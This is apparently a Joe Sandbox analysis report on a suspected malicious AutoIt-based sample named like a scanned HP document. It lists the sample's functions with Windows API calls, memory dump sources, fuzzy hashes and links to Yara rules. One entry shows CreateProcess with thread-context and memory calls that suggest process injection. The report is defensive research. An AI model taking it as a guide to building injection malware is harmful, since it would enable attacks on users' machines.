CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,0081949C,?,00008000), ref: 00854052

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2898dffe25538cb1792f2974e98b9a6d48df72ad4292d2411dc51dde4686d842
Instruction ID: 79ff646c2aedf1032437b16e01f7d40c7844981aa6a31c4e47d582870b62115a
Opcode Fuzzy Hash: 2898dffe25538cb1792f2974e98b9a6d48df72ad4292d2411dc51dde4686d842
Instruction Fuzzy Hash: AE014031245625F6E3714A2ADC0EF977F98FF42BB5F148610BA9C9A1E0CBB45894CB90

Function 0081B710 Relevance: 2.1, APIs: 1, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0081BB4E

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: c99958db27d011a9aa7c861921ad593cf83c55bbcfb3e2f3b3374658ac5bf289
Instruction ID: d5c005ee34f0c5c077b839d4bfe7c339b11c4e58a02cb77bfbb24da408bac84d
Opcode Fuzzy Hash: c99958db27d011a9aa7c861921ad593cf83c55bbcfb3e2f3b3374658ac5bf289
Instruction Fuzzy Hash: A732BB30A002099FDB24CF58C994ABABBB9FF44354F158069E915EB3A1D774ED82CF91

Function 01072B15 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 010732D3
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01073369
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0107338B

Memory Dump Source

Source File: 00000000.00000002.1461712896.0000000001071000.00000040.00000020.00020000.00000000.sdmp, Offset: 01071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1071000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
Instruction ID: 2cd4ef3644f4bdff15d2bf4cb542ec057c063bd778c8a356cec9e6c7d2073448
Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
Instruction Fuzzy Hash: 0812CE24E24658C6EB24DF64D8507DEB272FF68300F1090E9910DEB7A5E77A4E81CF5A

Function 0089709C Relevance: 1.8, APIs: 1, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: 08d6ff0beffbe70a354ff1aea02b5d5912d61d180826b8b5fea886a7bfdf3c67
Instruction ID: f215ad7a0d83caf5b9552718afe34e2cc35341fe6ca3e373601c9f1b1418bc44
Opcode Fuzzy Hash: 08d6ff0beffbe70a354ff1aea02b5d5912d61d180826b8b5fea886a7bfdf3c67
Instruction Fuzzy Hash: 1CD12774A14209EFCF14EF98D8819EDBBB5FF48314F284159E915EB291EB30AD81CB91

Function 008958A2 Relevance: 1.7, APIs: 1, Instructions: 205COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00895930

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: e6e35a49426414a3322fe1d3282ade9ad83ec76381da8dcb9c18fa744f481b71
Instruction ID: 911ec66004f047ed76d8328995996d79f2c2e1662239ba6ce7e0030d2d451dd9
Opcode Fuzzy Hash: e6e35a49426414a3322fe1d3282ade9ad83ec76381da8dcb9c18fa744f481b71
Instruction Fuzzy Hash: D971BA30600629AFCF25EF58C880EBAB7F5FF99304F188129E955DB281D771AD81CB94

Function 0082FC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 0082FD1F

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 9483155d13b19cec2705f982529cead8b54638cbbf094dd17448211daa32e295
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 9E31E2B4A001299BD718CF59E490969FBB1FF49304B2486B5E90ACB656D731EEC1CBC0

Function 00814ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00814E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00814EDD,?,008E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00814E9C
Part of subcall function 00814E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00814EAE
Part of subcall function 00814E90: FreeLibrary.KERNEL32(00000000,?,?,00814EDD,?,008E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00814EC0

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,008E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00814EFD

Part of subcall function 00814E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00853CDE,?,008E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00814E62
Part of subcall function 00814E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00814E74
Part of subcall function 00814E59: FreeLibrary.KERNEL32(00000000,?,?,00853CDE,?,008E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00814E87

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: 57e6fc8da7400435b92d09a6a4e05c468d0965430de2f2702a99dbcb5936e645
Instruction ID: de8c78b55d79c401d95d3b0d969eb9d37a8086281f29e238dc9b3a85e129710c
Opcode Fuzzy Hash: 57e6fc8da7400435b92d09a6a4e05c468d0965430de2f2702a99dbcb5936e645
Instruction Fuzzy Hash: A011C132600205AADB14AB68D802FED77A9FF80711F108429F542EA2C1EE719E869791

Function 00848402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00848440

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 301b2e9b5e4937eb5470090748ea86564ee219f8e5ff6613f8bb63f9146963dd
Instruction ID: 3df8fb578c682be63db6571dabd516916779af875029ff88f4314e761c1aa171
Opcode Fuzzy Hash: 301b2e9b5e4937eb5470090748ea86564ee219f8e5ff6613f8bb63f9146963dd
Instruction Fuzzy Hash: A311067590410AEFCB05DF58E94199E7BF9FF48314F144059FC08EB312DA31DA118BA5

Function 00845000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00844C7D: RtlAllocateHeap.NTDLL(00000008,00811129,00000000,?,00842E29,00000001,00000364,?,?,?,0083F2DE,00843863,008E1444,?,0082FDF5,?), ref: 00844CBE

_free.LIBCMT ref: 0084506C

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction ID: 0f18758eb191b3cdfaa40fd28130323f51691c15115ef54cae43d8614235fd88
Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction Fuzzy Hash: 51012676204B096BE321CE699881A9AFBE9FB89370F65051DE184C3281EA30A805C6B5

Function 0083E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction ID: 231308ad2812756c43b4de4a09d60189baed25adaaa97ff5c1b904fd74793ae9
Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction Fuzzy Hash: 73F08132511A1896D6313A6E9C06B5A3798FFE2335F100719F925D22D2EB749802C6E6

Function 00819CB3 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00819CBD

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: 10c9670d2fbedfdd3de16219deb42da2e1224f8142166eedce00cb261b24ac3f
Instruction ID: 7d4b2ac4f5230677c382257966203c890066e6e02007593a2ff9de4c8947e22a
Opcode Fuzzy Hash: 10c9670d2fbedfdd3de16219deb42da2e1224f8142166eedce00cb261b24ac3f
Instruction Fuzzy Hash: 80F0A4B36006146ED7259F28D806AA6BBA8FF44760F10853AFA19CB1D1EB31E550CAE0

Function 00844C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00811129,00000000,?,00842E29,00000001,00000364,?,?,?,0083F2DE,00843863,008E1444,?,0082FDF5,?), ref: 00844CBE

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2aa3fb47fc82ce14220a2e99dc35e70d7a60c4c21aab380af832c93df6e09bea
Instruction ID: 94c889459cec5f5a962521b63eb299cc8657cd2311343df98edb4e018141c636
Opcode Fuzzy Hash: 2aa3fb47fc82ce14220a2e99dc35e70d7a60c4c21aab380af832c93df6e09bea
Instruction Fuzzy Hash: 8CF0E93160222CA7DB215F66AC89B5B3788FF917B1F1C6111BC15EA281CAB0D80046E1

Function 00843820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,008E1444,?,0082FDF5,?,?,0081A976,00000010,008E1440,008113FC,?,008113C6,?,00811129), ref: 00843852

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f436b4e79232ff988de3d4124e44c151ad51eacaa6d03ce959f0a8c741c685a3
Instruction ID: 1635e25d69729158aaa133496c9858856be944a5e75864bc188577a8e58dce99
Opcode Fuzzy Hash: f436b4e79232ff988de3d4124e44c151ad51eacaa6d03ce959f0a8c741c685a3
Instruction Fuzzy Hash: 8BE09B3150122C97E73126BB9C05B9BF749FF827B0F150131BD15D6591DB61EE0185E1

Function 00814F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,008E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00814F6D

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: ae7243db99213ecdcc3ab93391b4124c3f9dcfeb0518dd586d61456993a6b272
Instruction ID: d82a193909895d7bf16177c18fb4c43477346477f9cb1f2229289b40fb69b5cf
Opcode Fuzzy Hash: ae7243db99213ecdcc3ab93391b4124c3f9dcfeb0518dd586d61456993a6b272
Instruction Fuzzy Hash: ABF03971105752CFDB349F64E4908A2BBE8FF15329324A97EE1EBC6621CB319889DF50

Function 0087CCFF Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,0085EE51,008D3630,00000002), ref: 0087CD26

Part of subcall function 0087CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,0087CD19,?,?,?), ref: 0087CC59
Part of subcall function 0087CC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,0087CD19,?,?,?,?,0085EE51,008D3630,00000002), ref: 0087CC6E
Part of subcall function 0087CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,0087CD19,?,?,?,?,0085EE51,008D3630,00000002), ref: 0087CC7A

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: File$Pointer$Write
String ID:
API String ID: 3847668363-0
Opcode ID: 020e0ababdb7e01744968e9db81367fe8a2429593a33749d3bf18823e0efc7ec
Instruction ID: 526554e017c94c74d4f10cf5391f353ee54cb4878da0adadf35fdf3207ebe4e7
Opcode Fuzzy Hash: 020e0ababdb7e01744968e9db81367fe8a2429593a33749d3bf18823e0efc7ec
Instruction Fuzzy Hash: D4E06D7A500704EFD7219F8ADD018AABBF9FFC5360710852FE99AC2514D7B1EA14DB60

Function 00812DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00812DC4

Part of subcall function 00816B57: _wcslen.LIBCMT ref: 00816B6A

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 0cb7537c54c74fe5393e9ba6933332054868f47ce6068f06fef42d026c313739
Instruction ID: c43fcfa17eca432eccbf0dbdf9c709b0a5d82f0b5126f965a4c81c94f7c8b133
Opcode Fuzzy Hash: 0cb7537c54c74fe5393e9ba6933332054868f47ce6068f06fef42d026c313739
Instruction Fuzzy Hash: B5E0CD726041245BCB10925C9C05FEA77DDFFC8791F050071FD09D7248DA64AD848551

Function 00812B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00813837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00813908

Part of subcall function 0081D730: GetInputState.USER32 ref: 0081D807

SetCurrentDirectoryW.KERNEL32(?), ref: 00812B6B

Part of subcall function 008130F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0081314E

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: 3b632398eb09bbeb8efd3d2cf5a949d3de0298e0633dcbec47dacbfef2df298e
Instruction ID: 4a7389af0b92bb7c5eb8460d1d1269ddab480630e630ae231457812781227bb5
Opcode Fuzzy Hash: 3b632398eb09bbeb8efd3d2cf5a949d3de0298e0633dcbec47dacbfef2df298e
Instruction Fuzzy Hash: 6CE0863130424407CA05BB7DA8565EDA79EFFD6355F40153EF142C72A2CE6589C94353

Function 0085039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00850704,?,?,00000000,?,00850704,00000000,0000000C), ref: 008503B7

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: a4c07dba16edf7d013aa759931aaca0d44724cdb8d41a43f900b2fdf6d208d51
Instruction ID: 5a7243399ac559722f235d3d9a048c0b017f5e78b1abd75efbfd3fa447b9b2cc
Opcode Fuzzy Hash: a4c07dba16edf7d013aa759931aaca0d44724cdb8d41a43f900b2fdf6d208d51
Instruction Fuzzy Hash: BBD06C3214010DBBDF028F84DD06EDA3BAAFB48714F014000BE1856020C736E821AB90

Function 00811CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00811CBC

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: 36e0f665b0f343dea0151516d2602ccdcb003ac4a4492c705c2d2defc406de31
Instruction ID: 9bec22163f6cb7edad410d8b1d945d7d683fcd6417c717fc0a24f9ff700c7abb
Opcode Fuzzy Hash: 36e0f665b0f343dea0151516d2602ccdcb003ac4a4492c705c2d2defc406de31
Instruction Fuzzy Hash: CEC09B352803449FF6144780BD8EF107754B348B00F444001F6095D5E3C7F11810D650

Function 0088744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON

Download Yara Rule

APIs

Part of subcall function 00815745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0081949C,?,00008000), ref: 00815773

GetLastError.KERNEL32(00000002,00000000), ref: 008876DE

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
